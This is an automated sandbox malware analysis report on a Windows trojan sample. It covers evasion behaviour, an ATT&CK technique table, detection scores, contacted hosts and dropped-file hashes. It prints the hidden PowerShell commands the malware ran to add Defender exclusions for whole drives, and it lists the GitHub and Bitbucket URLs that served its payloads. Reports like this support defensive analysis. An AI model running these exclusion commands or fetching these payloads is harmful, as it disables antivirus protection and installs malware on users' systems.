Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Reka\rapnewsa.exe - Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_23-2515
Source: C:\Reka\rapnewsa.exe - Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_23-2603
Source: C:\Reka\rapnewsa.exe - System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: 5B40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: 5D60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: 5B70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: B870000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: F870000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: FFB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Memory allocated: 13FB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Window / User API: threadDelayed 7687
Source: C:\Users\user\Desktop\UBONg7lmVR.exe - Window / User API: threadDelayed 2233
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1695
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7716
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1978
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6770
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2099
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7720 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7852 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 7852 - Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 - Thread sleep count: 7453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588 - Thread sleep count: 2099 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Reka\rapnewsa.exe - Code function: 23_2_002C8D40 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Reka\rapnewsa.exe - Code function: 23_2_002C8CA0 GetSystemInfo
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: rapnewsa.exe, 00000017.00000002.2746189003.00000000013F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: UBONg7lmVR.exe, 00000000.00000002.3547008907.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: y5cm2yzz.hwt.exe, 00000002.00000002.2761737638.0000016AC13FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: C:\Reka\rapnewsa.exe API call chain: ExitProcess graph end node graph_23-2531
Source: C:\Reka\rapnewsa.exe API call chain: ExitProcess graph end node graph_23-2525
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Reka\rapnewsa.exe Process queried: DebugPort
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C17E0 GlobalHandle,LoadLibraryA,GetProcAddress, 23_2_002C17E0
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C1A20 mov eax, dword ptr fs:[00000030h] 23_2_002C1A20
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Process created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C8A80 cpuid 23_2_002C8A80
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Users\user\Desktop\UBONg7lmVR.exe VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 11 Input Capture | 1 Query Registry | Remote Services | 11 Input Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 211 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 141 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 141 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph: ID 1499702; Sample: UBONg7lmVR.exe; Startdate: 27/08/2024; Architecture: WINDOWS; Score: 75]

Source | Detection | Scanner | Label | Link
UBONg7lmVR.exe | 3% | ReversingLabs | Win32.Trojan.Generic |
UBONg7lmVR.exe | 14% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Reka\rapnewsa.exe | 100% | Avira | HEUR/AGEN.1315917 |
C:\Reka\rapnewsa.exe | 100% | Joe Sandbox ML | |
C:\Reka\rapnewsa.exe | 16% | ReversingLabs | |
C:\Reka\rapnewsa.exe | 24% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe | 11% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe | 8% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
s3-w.us-east-1.amazonaws.com | 0% | Virustotal | | Browse
bitbucket.org | 1% | Virustotal | | Browse
github.com | 0% | Virustotal | | Browse
raw.githubusercontent.com | 0% | Virustotal | | Browse
httpbin.org | 1% | Virustotal | | Browse
bbuseruploads.s3.amazonaws.com | 3% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.216.51.233 | true | false | | unknown
bitbucket.org | 185.166.143.49 | true | false | | unknown
github.com | 140.82.121.3 | true | false | | unknown
raw.githubusercontent.com | 185.199.111.133 | true | false | | unknown
httpbin.org | 3.211.178.193 | true | false | | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://45.125.66.18/api/receiver/recv | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://httpbin.org/get | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json | false | Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.166.143.49 | bitbucket.org | Germany | | 16509 | AMAZON-02US | false
140.82.121.3 | github.com | United States | | 36459 | GITHUBUS | false
52.216.51.233 | s3-w.us-east-1.amazonaws.com | United States | | 16509 | AMAZON-02US | false
3.211.178.193 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false
45.125.66.18 | unknown | Hong Kong | | 133398 | TELE-ASTeleAsiaLimitedHK | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1499702
Start date and time: 2024-08-27 13:04:47 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: UBONg7lmVR.exe (renamed because original name is a hash value)
Original Sample Name: e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Detection: MAL
Classification: mal75.evad.winEXE@27/32@5/6
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 244
  • Number of non-executed functions: 15
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target y5cm2yzz.hwt.exe, PID 7992 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.166.143.49https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
    sostener.vbsGet hashmaliciousRemcosBrowse
      Crpted.vbsGet hashmaliciousUnknownBrowse
        sostener.vbsGet hashmaliciousRemcosBrowse
          remittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
            ExeFile (71).exeGet hashmaliciousUnknownBrowse
              xKCGmDmnB1.exeGet hashmaliciousLummaCBrowse
                SecuriteInfo.com.Win32.DropperX-gen.16703.29630.exeGet hashmaliciousLummaCBrowse
                  SecuriteInfo.com.Win32.PWSX-gen.17487.29686.exeGet hashmaliciousLummaCBrowse
                    https://t.ly/tCnoFGet hashmaliciousUnknownBrowse
                      140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                      • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                      firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                      • github.com/john-xor/temp/blob/main/index.html?raw=true
                      0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                      • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                      MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                      • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                      RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                      • github.com/ssbb36/stv/raw/main/5.mp3
                      185.199.111.133SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                        https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                          https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                            https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                              file.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  5c683657-3d2b-5cd5-b372-9be474a3f97e.emlGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exeGet hashmaliciousUnknownBrowse
                                      https://error--occurs--site.vercel.app/Get hashmaliciousUnknownBrowse
                                        45.125.66.181feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                          V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                            V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                              C:\Reka\rapnewsa.exe | 1feP5qTCl0.exe | Get hash | malicious | Unknown | Browse |
                                                Process:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.972409904582663
                                                Encrypted:false
                                                SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                                                MD5:2D4E723C184D9403B078E53F2DE74A23
                                                SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                                                SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                                                SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 16%
                                                • Antivirus: Virustotal, Detection: 24%, Browse
                                                Joe Sandbox View:
                                                • Filename: 1feP5qTCl0.exe, Detection: malicious, Browse
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
